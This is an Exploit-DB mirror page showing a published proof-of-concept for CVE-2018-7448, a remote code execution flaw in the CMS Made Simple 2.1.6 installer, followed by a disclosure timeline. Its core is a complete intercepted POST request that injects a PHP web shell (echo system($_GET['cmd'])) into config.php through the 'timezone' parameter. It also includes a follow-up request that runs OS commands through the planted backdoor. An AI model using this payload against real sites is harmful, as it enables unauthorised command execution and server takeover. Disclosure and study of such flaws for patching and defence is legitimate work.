bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/44192.txt
Offensive Security 5d48f0abd2 DB: 2018-02-28 
16 changes to exploits/shellcodes

Transmission - Integer Overflows Parsing Torrent Files
Chrome V8 - 'PropertyArray' Integer Overflow
Chrome V8 - 'TranslatedState::MaterializeCapturedObjectAt' Type Confusion
Asterisk chan_pjsip 15.2.0 - 'INVITE' Denial of Service
Asterisk chan_pjsip 15.2.0 - 'SDP' Denial of Service
Asterisk chan_pjsip 15.2.0 - 'SDP fmtp' Denial of Service
Asterisk chan_pjsip 15.2.0 - 'SUBSCRIBE' Stack Corruption
Microsoft Windows Windows 8.1/2012 R2 - SMB Denial of Service

Sony Playstation 4 4.55 FW - Local Kernel

GetGo Download Manager 5.3.0.2712 - Buffer Overflow (SEH)
Schools Alert Management Script 2.0.2 - Authentication Bypass
MyBB My Arcade Plugin 1.3 - Cross-Site Scripting
Joomla! Component K2 2.8.0 - Arbitrary File Download
School Management Script 3.0.4 - Authentication Bypass
CMS Made Simple 2.1.6 - Remote Code Execution
Concrete5 < 8.3.0 - Username / Comments Enumeration
2018-02-28 05:01:52 +00:00

46 lines
No EOL
2.4 KiB
Text
Raw Blame History

# Exploit Title: CMS Made Simple 2.1.6 - Remote Code Execution
# Date: 2018-02-26
# Exploit Author: Keerati T.
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: http://s3.amazonaws.com/cmsms/downloads/13570/cmsms-2.
1.6-install.zip
# Version: 2.1.6
# CVE: CVE-2018-7448
# Tested on: Linux
1.Description
Arbitrary PHP code can be injected into configuration file (config.php) after installation has been finished. In order to inject PHP code, fresh install and valid database credentials is required. Application will force an installer (usually "www-data" due to web-based installation) to set a write permission (777) to destination directory and related installation file. An attacker will proceed installation process until reach step 4 and inject malicious PHP code into "timezone" parameter. Once PHP code has been injected to "config.php", an attacker will be able to execute OS command by accessing backdoor "config.php" file along with injected parameter which contain OS command value.
2.Proof of Concept
- Access to "http://target/path/cmsms-2.1.6-install.php" for installing CMS Made Simple
- Proceed to step 4 of installation which is database setup stage, enter a valid database credentials and modifying "timezone" parameter on intercepted proxy as following:
==========
POST /cms/cmsms-2.1.6-install.php/index.php?mdf68c24c=4 HTTP/1.1
Host: 192.168.5.196
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.196/cms/cmsms-2.1.6-install.php/index.
php?mdf68c24c=4
Cookie: CMSICc861538bbb=i549m59qpme0u9klupbkb68me4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 126
dbhost=localhost&dbname=cms&dbuser=xvwa&dbpass=xvwa&
timezone=junk';echo%20system($_GET['cmd']);$junk='junk&next=Next+%E2%86%92
==========
- Forward tampered "timezone" parameter packet and proceed to next step until successfully installation.
- Execute OS command via "config.php" by requesting " http://target/path/config.php?cmd=id;uname"
3.Timeline
2017-04-14 Vulnerability report
2017-04-15 Vendor inform that will be fixed on next full release
2017-06-10 Version 2.2 release and vulnerability fixed
2018-02-23 CVE assigned
2018-02-26 Public
Reference in a new issue View git blame Copy permalink